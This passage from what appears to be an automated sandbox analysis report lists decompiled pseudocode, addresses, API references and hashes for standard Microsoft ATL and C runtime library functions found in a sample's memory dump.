                      • Opcode ID: 385f6daaa90a5fafe8858fbd74156b41f0edc0f9481c66441a6561cdf517e806
                      • Instruction ID: 92c76752b5efdf449c2958d74eb18c53bd413e97174732df870e8902d3597abe
                      • Opcode Fuzzy Hash: 385f6daaa90a5fafe8858fbd74156b41f0edc0f9481c66441a6561cdf517e806
                      • Instruction Fuzzy Hash: 9F418D71D04248AFCF08DFE4D4A1AEEBBB9EF95304F248099E856A7341D635AB45CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00941AC0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 80COMMON
                      Download Yara Rule
                      C-Code - Quality: 72%
                      			E00941AC0(void* __ecx, void* __esi, short* _a4, char* _a8, int _a12, int _a16) {
				intOrPtr _v8;
				short* _t14;
				int _t18;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t32;
				void* _t33;

				_v8 = 0xcccccccc;
				_t35 = _a8;
				if(_a8 == 0) {
					_t22 = L00994930(_t35, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x234, 0, "%ls", L"lpa != 0");
					_t33 = _t33 + 0x18;
					if(_t22 == 1) {
						asm("int3");
					}
				}
				_t37 = _a4;
				if(_a4 == 0) {
					_t21 = L00994930(_t37, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x235, 0, "%ls", L"lpw != 0");
					_t33 = _t33 + 0x18;
					if(_t21 == 1) {
						asm("int3");
					}
				}
				if(_a4 == 0 || _a8 == 0) {
					_t14 = 0;
				} else {
					 *_a4 = 0;
					_t18 = MultiByteToWideChar(_a16, 0, _a8, 0xffffffff, _a4, _a12);
					__eflags = _t33 - _t33;
					_v8 = E009D1520(_t18, _t33 - _t33);
					__eflags = _v8;
					if(__eflags != 0) {
						_t14 = _a4;
					} else {
						__eflags = 0;
						if(0 == 0) {
							_t20 = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x23f, 0, "%ls", 0x9f40dc);
							_t33 = _t33 + 0x18;
							__eflags = _t20 - 1;
							if(__eflags == 0) {
								asm("int3");
							}
						}
						_t14 = 0;
					}
				}
				return E009D1520(_t14, _t32 - _t33 + 4);
			}











                      0x00941ac5
                      0x00941acc
                      0x00941ad0
                      0x00941aea
                      0x00941aef
                      0x00941af5
                      0x00941af7
                      0x00941af7
                      0x00941af5
                      0x00941af8
                      0x00941afc
                      0x00941b16
                      0x00941b1b
                      0x00941b21
                      0x00941b23
                      0x00941b23
                      0x00941b21
                      0x00941b28
                      0x00941b30
                      0x00941b34
                      0x00941b39
                      0x00941b52
                      0x00941b58
                      0x00941b5f
                      0x00941b62
                      0x00941b66
                      0x00941b96
                      0x00941b68
                      0x00941b68
                      0x00941b6a
                      0x00941b84
                      0x00941b89
                      0x00941b8c
                      0x00941b8f
                      0x00941b91
                      0x00941b91
                      0x00941b8f
                      0x00941b92
                      0x00941b92
                      0x00941b66
                      0x00941ba7

                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,?), ref: 00941B52
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlconv.h$lpa != 0$lpw != 0
                      • API String ID: 626452242-3592995100
                      • Opcode ID: 69684b50f9e0f5a3fcb9f0f36e55fa56e8149aeb271d1038240448048f894707
                      • Instruction ID: 372f21b215aa07a9a46e21b7ae8580f30b2dd0b4bcaa7b18a4c92fc132baf1e2
                      • Opcode Fuzzy Hash: 69684b50f9e0f5a3fcb9f0f36e55fa56e8149aeb271d1038240448048f894707
                      • Instruction Fuzzy Hash: 8821D431B9031CBBDB209B58EC07FBB3358DBA4B54F108515FA146A1C1F6B499D08B91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009652B0 Relevance: 7.6, APIs: 5, Instructions: 52COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E009652B0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v32;
				char _v40;
				char _v48;
				char _v56;
				void* _t34;
				void* _t46;
				void* _t47;

				_t47 = __esi;
				_t46 = __edi;
				_t34 = __ebx;
				_v8 = E0095F7A0(8, 0xb3065c, 0);
				_t52 = _v8;
				if(_v8 == 0) {
					_v12 = 0;
				} else {
					_v12 = E0095F3F0(_v8);
				}
				_v16 = _v12;
				E00964380(_t34, _t46, _t47, _t52,  &_v32, _v16);
				_v20 = E00967D00( &_v40);
				_v24 = E0095FBB0(_v20,  &_v48, 0x20);
				E0095F820(_v16, E0095FB70(_v24,  &_v56, _a8));
				E0095F240(_a4,  &_v32);
				return _a4;
			}















                      0x009652b0
                      0x009652b0
                      0x009652b0
                      0x009652c7
                      0x009652ca
                      0x009652ce
                      0x009652dd
                      0x009652d0
                      0x009652d8
                      0x009652d8
                      0x009652e7
                      0x009652f2
                      0x00965306
                      0x00965317
                      0x0096532e
                      0x0096533a
                      0x00965345

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: MailboxName::operator+$Iterator_baseIterator_base::_std::_
                      • String ID:
                      • API String ID: 2657989147-0
                      • Opcode ID: 8c0d8c6db4faef42eff600e9c5dcca735c6e4c200a501d09949ebfee4ed07dd8
                      • Instruction ID: c7cc1a799f81ed66b5b0f2205ec5471411dba930f585d6940ed50c52e0dbfb64
                      • Opcode Fuzzy Hash: 8c0d8c6db4faef42eff600e9c5dcca735c6e4c200a501d09949ebfee4ed07dd8
                      • Instruction Fuzzy Hash: 711107B5D00108AFDB04EFD4D862FEEB7B8AF84311F108569F91567281D7706B04CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009627C0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E009627C0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v12;
				char _v20;
				char* _t13;
				intOrPtr _t22;
				char* _t33;

				_t13 =  *0xb30640; // 0x0
				if( *_t13 != 0) {
					E009686C0(__ebx, __edi, __esi,  &_v12);
					E0095FDE0( &_v12, 0x5b);
					E0095FD40( &_v12, E009686C0(__ebx, __edi, __esi,  &_v20));
					E0095FDE0( &_v12, 0x5d);
					_t33 =  *0xb30640; // 0x0
					if( *_t33 != 0x40) {
						E0095F350(_a4, 2);
						return _a4;
					}
					_t22 =  *0xb30640; // 0x0
					 *0xb30640 = _t22 + 1;
					E0095F240(_a4,  &_v12);
					return _a4;
				}
				E0095F350(_a4, 1);
				return _a4;
			}








                      0x009627c6
                      0x009627d0
                      0x009627e5
                      0x009627f2
                      0x00962807
                      0x00962811
                      0x00962816
                      0x00962822
                      0x00962847
                      0x00000000
                      0x0096284c
                      0x00962824
                      0x0096282c
                      0x00962838
                      0x00000000
                      0x0096283d
                      0x009627d7
                      0x00000000

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 009627D7
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      • DName::operator+=.LIBCMTD ref: 009627F2
                      • DName::operator+=.LIBCMTD ref: 00962811
                      • Mailbox.LIBCMTD ref: 00962838
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: NameName::operator+=$MailboxName::Node::makeStatus
                      • String ID:
                      • API String ID: 3118159130-0
                      • Opcode ID: cac4dd6d881a4a39305e26f7b689f23ae78d8fe5bd146cf80a56bba1408d4bac
                      • Instruction ID: 214f4897d29d68017cfc43ec19e8bb9df7a1064062494fc870ca2ff67186c760
                      • Opcode Fuzzy Hash: cac4dd6d881a4a39305e26f7b689f23ae78d8fe5bd146cf80a56bba1408d4bac
                      • Instruction Fuzzy Hash: 791192B0600508ABEB04EF50DCA6EBE3B74AF90355F404068FC0A5B1A6DF31BA44CB81
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0099C690 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 175timeCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 97%
                      			E0099C690(signed int __ecx, void* __edi) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v68;
				signed int _t83;
				intOrPtr _t90;
				signed int _t102;
				char _t105;
				void* _t112;
				void* _t116;
				void* _t169;
				void* _t170;
				void* _t173;

				_t169 = __edi;
				_v12 = __ecx;
				_t83 = _v12;
				if( *((intOrPtr*)( *_t83)) != 0) {
					_v32 = E0099C490( *((intOrPtr*)( *((intOrPtr*)( *_v12)))));
					_v24 = E0099C490( *((intOrPtr*)( *((intOrPtr*)( *_v12)) + 4)));
					_t90 = E0099C490( *((intOrPtr*)( *((intOrPtr*)( *_v12)) + 8)));
					_t173 = _t170 + 0xc;
					_v36 = _t90;
					if(_v24 != _v36) {
						L18:
						 *_v24 = E0099C4C0( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_v24 = _v24 + 4;
						 *((intOrPtr*)( *((intOrPtr*)( *_v12)))) = E0099C520(_v32);
						 *((intOrPtr*)( *((intOrPtr*)( *_v12)) + 4)) = E0099C520(_v24);
						 *((intOrPtr*)( *((intOrPtr*)( *_v12)) + 8)) = E0099C520(_v36);
						return 0;
					}
					_v28 = _v36 - _v32 >> 2;
					if(_v28 <= 0x200) {
						_v44 = _v28;
					} else {
						_v44 = 0x200;
					}
					_v48 = _v44;
					_t102 = _v28 + _v48;
					_v16 = _t102;
					if(_t102 == 0) {
						_v16 = 0x20;
					}
					_v20 = 0;
					_t135 = _v16;
					if(_v16 >= _v28) {
						_t116 = E009997D0(_t135, _t169, _v32, _v16, 4, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\startup\\onexit.cpp", 0x70);
						_t173 = _t173 + 0x18;
						_v52 = E0099C620( &_v56, _t116);
						_v20 = E0099CAD0(_v52);
						_t102 = E0099C640( &_v56);
					}
					if(_v20 == 0) {
						_v16 = _v28 + 4;
						_t112 = E009997D0(_v28 + 4, _t169, _v32, _v16, 4, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\startup\\onexit.cpp", 0x77);
						_t173 = _t173 + 0x18;
						_v60 = E0099C620( &_v64, _t112);
						_v20 = E0099CAD0(_v60);
						_t102 = E0099C640( &_v64);
					}
					if(_v20 != 0) {
						_v32 = _v20;
						_v24 = _v20 + _v28 * 4;
						_v36 = _v20 + _v16 * 4;
						_push(0);
						_t105 = E00999900(_v20 + _v16 * 4);
						_t173 = _t173 + 4;
						_v5 = _t105;
						_v68 = E0099C260( &_v5);
						_v40 = _v24;
						while(_v40 != _v36) {
							 *_v40 = _v68;
							_v40 = _v40 + 4;
						}
						goto L18;
					} else {
						return _t102 | 0xffffffff;
					}
				}
				return _t83 | 0xffffffff;
			}




























                      0x0099c690
                      0x0099c698
                      0x0099c69b
                      0x0099c6a3
                      0x0099c6bf
                      0x0099c6d5
                      0x0099c6e3
                      0x0099c6e8
                      0x0099c6eb
                      0x0099c6f4
                      0x0099c82f
                      0x0099c843
                      0x0099c84b
                      0x0099c861
                      0x0099c876
                      0x0099c88c
                      0x00000000
                      0x0099c88f
                      0x0099c703
                      0x0099c70d
                      0x0099c71b
                      0x0099c70f
                      0x0099c70f
                      0x0099c70f
                      0x0099c721
                      0x0099c727
                      0x0099c72a
                      0x0099c72d
                      0x0099c72f
                      0x0099c72f
                      0x0099c736
                      0x0099c73d
                      0x0099c743
                      0x0099c758
                      0x0099c75d
                      0x0099c769
                      0x0099c774
                      0x0099c77a
                      0x0099c77a
                      0x0099c783
                      0x0099c78b
                      0x0099c7a1
                      0x0099c7a6
                      0x0099c7b2
                      0x0099c7bd
                      0x0099c7c3
                      0x0099c7c3
                      0x0099c7cc
                      0x0099c7d9
                      0x0099c7e5
                      0x0099c7f1
                      0x0099c7f4
                      0x0099c7f6
                      0x0099c7fb
                      0x0099c7fe
                      0x0099c809
                      0x0099c80f
                      0x0099c81d
                      0x0099c82b
                      0x0099c81a
                      0x0099c81a
                      0x00000000
                      0x0099c7ce
                      0x00000000
                      0x0099c7ce
                      0x0099c7cc
                      0x00000000

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 0099C764
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 0099C7AD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: $minkernel\crts\ucrt\src\appcrt\startup\onexit.cpp
                      • API String ID: 4219598475-1215429239
                      • Opcode ID: c874602c67dceb562da4d449d4320f7efa2e51fe57a982830bb7d25a5dc6e57b
                      • Instruction ID: 2a0ca2b9b7e7aa3c13dd4f0631edea30c4325889f8eddeb6aa960ceb559decbc
                      • Opcode Fuzzy Hash: c874602c67dceb562da4d449d4320f7efa2e51fe57a982830bb7d25a5dc6e57b
                      • Instruction Fuzzy Hash: 4771E8B4E00209DFDF04DFA8D891AAEB7B1BF88314F208159E515BB351E735AA41CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0094F760 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 162COMMON
                      Download Yara Rule
                      C-Code - Quality: 67%
                      			E0094F760(void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed int _v36;
				void* _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr* _v56;
				void* __ebp;
				signed int _t62;
				void* _t67;
				void* _t74;
				signed char _t80;
				void* _t86;
				void* _t90;
				void* _t92;
				intOrPtr _t98;
				intOrPtr _t107;
				intOrPtr* _t117;
				intOrPtr* _t120;
				intOrPtr _t123;
				intOrPtr _t125;
				signed int _t134;
				void* _t135;
				void* _t136;

				_t129 = __esi;
				_t127 = __edi;
				_t117 = __edx;
				_t93 = __ebx;
				_push(0xfffffffe);
				_push(0xa03390);
				_push(E00959CD0);
				_push( *[fs:0x0]);
				_t136 = _t135 + 0xffffffdc;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v56 = 0xcccccccc;
				_v52 = 0xcccccccc;
				_v48 = 0xcccccccc;
				_v44 = 0xcccccccc;
				_v40 = 0xcccccccc;
				_v36 = 0xcccccccc;
				_v32 = 0xcccccccc;
				_t62 =  *0xa0600c; // 0x5d529087
				_v12 = _v12 ^ _t62;
				_push(_t62 ^ _t134);
				 *[fs:0x0] =  &_v20;
				_v32 = 0x80004003;
				if(_a16 == 0) {
					L19:
					_push(_t117);
					_push(_v32);
					E009D14C0(_t134, 0x94f968);
					_pop(_t67);
					 *[fs:0x0] = _v20;
					return E009D1520(_t67, _t134 - _t136 + 0x34);
				} else {
					 *_a16 = 0;
					_t139 = _a8;
					if(_a8 != 0) {
						_t92 = L00994930(_t139, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlcom.h", 0xf6b, 0, "%ls", L"pUnkOuter == 0");
						_t136 = _t136 + 0x18;
						if(_t92 == 1) {
							asm("int3");
						}
					}
					if(_a8 == 0) {
						_t120 = _a4;
						__eflags =  *(_t120 + 0x28);
						if( *(_t120 + 0x28) != 0) {
							L16:
							_t98 = _a4;
							__eflags =  *(_t98 + 0x28);
							if( *(_t98 + 0x28) != 0) {
								_t117 = _a4;
								_v32 =  *((intOrPtr*)(_t117 + 0x28));
							} else {
								_v56 = E0094EE90(_a4 + 0x2c);
								_t117 = _v56;
								_t74 =  *((intOrPtr*)( *((intOrPtr*)( *_t117))))(_v56, _a12, _a16);
								__eflags = _t136 - _t136;
								_v32 = E009D1520(_t74, _t136 - _t136);
							}
							goto L19;
						}
						__eflags = E0094EE60(_a4 + 0x2c, 0) & 0x000000ff;
						if(__eflags != 0) {
							_v8 = 0;
							E0094E840(_a4 + 4, _t129, __eflags);
							_t107 = _a4;
							__eflags =  *(_t107 + 0x28);
							if( *(_t107 + 0x28) == 0) {
								_t109 = _a4 + 0x2c;
								_t80 = E0094EE60(_a4 + 0x2c, 0);
								__eflags = _t80 & 0x000000ff;
								if((_t80 & 0x000000ff) != 0) {
									 *((intOrPtr*)(_a4 + 0x28)) = E00952BD0(_t93, _t109, _t127, _t129,  &_v40);
									_t123 = _a4;
									__eflags =  *(_t123 + 0x28);
									if( *(_t123 + 0x28) >= 0) {
										_t86 =  *((intOrPtr*)( *((intOrPtr*)( *_v40))))(_v40, 0xa002d4, E0094EEE0(_a4 + 0x2c));
										__eflags = _t136 - _t136;
										 *((intOrPtr*)(_a4 + 0x28)) = E009D1520(_t86, _t136 - _t136);
										_t125 = _a4;
										__eflags =  *(_t125 + 0x28);
										if( *(_t125 + 0x28) < 0) {
											_v48 = _v40;
											__eflags = _v48;
											if(_v48 == 0) {
												_v52 = 0;
											} else {
												_t90 =  *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x14))))(1);
												__eflags = _t136 - _t136;
												_v52 = E009D1520(_t90, _t136 - _t136);
											}
										}
									}
								}
							}
							_v8 = 0xfffffffe;
							E0094F8E6();
						}
						goto L16;
					} else {
						_v32 = 0x80040110;
						goto L19;
					}
				}
			}






























                      0x0094f760
                      0x0094f760
                      0x0094f760
                      0x0094f760
                      0x0094f763
                      0x0094f765
                      0x0094f76a
                      0x0094f775
                      0x0094f776
                      0x0094f779
                      0x0094f77a
                      0x0094f77b
                      0x0094f781
                      0x0094f784
                      0x0094f787
                      0x0094f78a
                      0x0094f78d
                      0x0094f790
                      0x0094f793
                      0x0094f796
                      0x0094f79b
                      0x0094f7a0
                      0x0094f7a4
                      0x0094f7aa
                      0x0094f7b5
                      0x0094f935
                      0x0094f938
                      0x0094f93b
                      0x0094f942
                      0x0094f947
                      0x0094f94c
                      0x0094f964
                      0x0094f7bb
                      0x0094f7be
                      0x0094f7c4
                      0x0094f7c8
                      0x0094f7e2
                      0x0094f7e7
                      0x0094f7ed
                      0x0094f7ef
                      0x0094f7ef
                      0x0094f7ed
                      0x0094f7f4
                      0x0094f802
                      0x0094f805
                      0x0094f809
                      0x0094f8f2
                      0x0094f8f2
                      0x0094f8f5
                      0x0094f8f9
                      0x0094f92c
                      0x0094f932
                      0x0094f8fb
                      0x0094f906
                      0x0094f917
                      0x0094f91e
                      0x0094f920
                      0x0094f927
                      0x0094f927
                      0x00000000
                      0x0094f8f9
                      0x0094f81f
                      0x0094f821
                      0x0094f827
                      0x0094f834
                      0x0094f839
                      0x0094f83c
                      0x0094f840
                      0x0094f84b
                      0x0094f84e
                      0x0094f856
                      0x0094f858
                      0x0094f866
                      0x0094f869
                      0x0094f86c
                      0x0094f870
                      0x0094f890
                      0x0094f892
                      0x0094f89c
                      0x0094f89f
                      0x0094f8a2
                      0x0094f8a6
                      0x0094f8ab
                      0x0094f8ae
                      0x0094f8b2
                      0x0094f8d1
                      0x0094f8b4
                      0x0094f8c3
                      0x0094f8c5
                      0x0094f8cc
                      0x0094f8cc
                      0x0094f8b2
                      0x0094f8a6
                      0x0094f870
                      0x0094f858
                      0x0094f8d8
                      0x0094f8df
                      0x0094f8df
                      0x00000000
                      0x0094f7f6
                      0x0094f7f6
                      0x00000000
                      0x0094f7f6
                      0x0094f7f4

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 0094F942
                      Strings
                      • %ls, xrefs: 0094F7CF
                      • pUnkOuter == 0, xrefs: 0094F7CA
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h, xrefs: 0094F7DB
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h$pUnkOuter == 0
                      • API String ID: 930174750-63398507
                      • Opcode ID: 912510a99822814420db634c6f85013eff1c6104ed577bf9089c8ff0ab4bd073
                      • Instruction ID: b17cc453dffccbfaccdd57b55a2a90476a9b7545c9051a142e24d3205a84a59d
                      • Opcode Fuzzy Hash: 912510a99822814420db634c6f85013eff1c6104ed577bf9089c8ff0ab4bd073
                      • Instruction Fuzzy Hash: 5C514E71E0020AAFDB04DF98D491BAE77B5FF88354F108569E90AAB381D7759D81CF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00946E40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 146COMMON
                      Download Yara Rule
                      C-Code - Quality: 64%
                      			E00946E40(void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				intOrPtr* _v28;
				char _v36;
				intOrPtr* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v56;
				intOrPtr _t49;
				intOrPtr _t54;
				intOrPtr _t55;
				void* _t57;
				intOrPtr _t59;
				void* _t63;
				void* _t67;
				void* _t68;
				intOrPtr _t72;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t93;
				void* _t94;
				void* _t95;

				_t83 = __edx;
				_push(__ecx);
				memset( &_v56, 0xcccccccc, 0xd << 2);
				_t95 = _t94 + 0xc;
				_pop(_t72);
				_v8 = _t72;
				do {
					if(_a4 < 0) {
						_v52 = 0;
					} else {
						_v52 = 1;
					}
					_v12 = _v52;
					_t98 = _v12;
					if(_v12 == 0) {
						_t68 = L00994930(_t98, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlstr.h", 0x45, 0, "%ls", L"__atl_condVal");
						_t95 = _t95 + 0x18;
						if(_t68 == 1) {
							asm("int3");
						}
					}
					if(_v12 == 0) {
						_t55 = 0;
						L28:
						_push(_t83);
						E009D14C0(_t93, 0x946fe4);
						_t57 = _t55;
						return E009D1520(_t57, _t93 - _t95 + 0x34);
					}
					_t83 = 0;
					__eflags = 0;
				} while (0 != 0);
				_t49 = E00951ED0( &_a4,  &_a4, _a4, 1);
				_t95 = _t95 + 0xc;
				__eflags = _t49;
				if(_t49 >= 0) {
					_t83 = _a4;
					_v44 = L00951F10(_t83, 8);
					while(1) {
						__eflags = _a4 - _v44;
						if(_a4 > _v44) {
							_v56 = 0;
						} else {
							_v56 = 1;
						}
						_v48 = _v56;
						__eflags = _v48;
						if(__eflags == 0) {
							_t67 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlstr.h", 0x51, 0, "%ls", L"__atl_condVal");
							_t95 = _t95 + 0x18;
							__eflags = _t67 - 1;
							if(_t67 == 1) {
								asm("int3");
							}
						}
						__eflags = _v48;
						if(_v48 == 0) {
							break;
						}
						__eflags = 0;
						if(0 != 0) {
							continue;
						}
						_t83 = _v44;
						_t54 = E00941800(_a8,  &_v36, _t83, _a8);
						_t95 = _t95 + 0xc;
						__eflags = _t54;
						if(_t54 < 0) {
							L24:
							_t55 = 0;
							goto L28;
						}
						_t83 =  &_v20;
						_t59 = E00951C60(_t54, _v36, _t83, 0x10, _v36);
						_t95 = _t95 + 0xc;
						__eflags = _t59;
						if(_t59 >= 0) {
							_t83 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 4))));
							_t63 =  *((intOrPtr*)( *_t83))(_v20);
							__eflags = _t95 - _t95;
							_v28 = E009D1520(_t63, _t95 - _t95);
							__eflags = _v28;
							if(_v28 != 0) {
								 *_v28 = _v8;
								 *((intOrPtr*)(_v28 + 0xc)) = 1;
								_t82 = _v44 - 1;
								__eflags = _t82;
								_t83 = _v28;
								 *((intOrPtr*)(_t83 + 8)) = _t82;
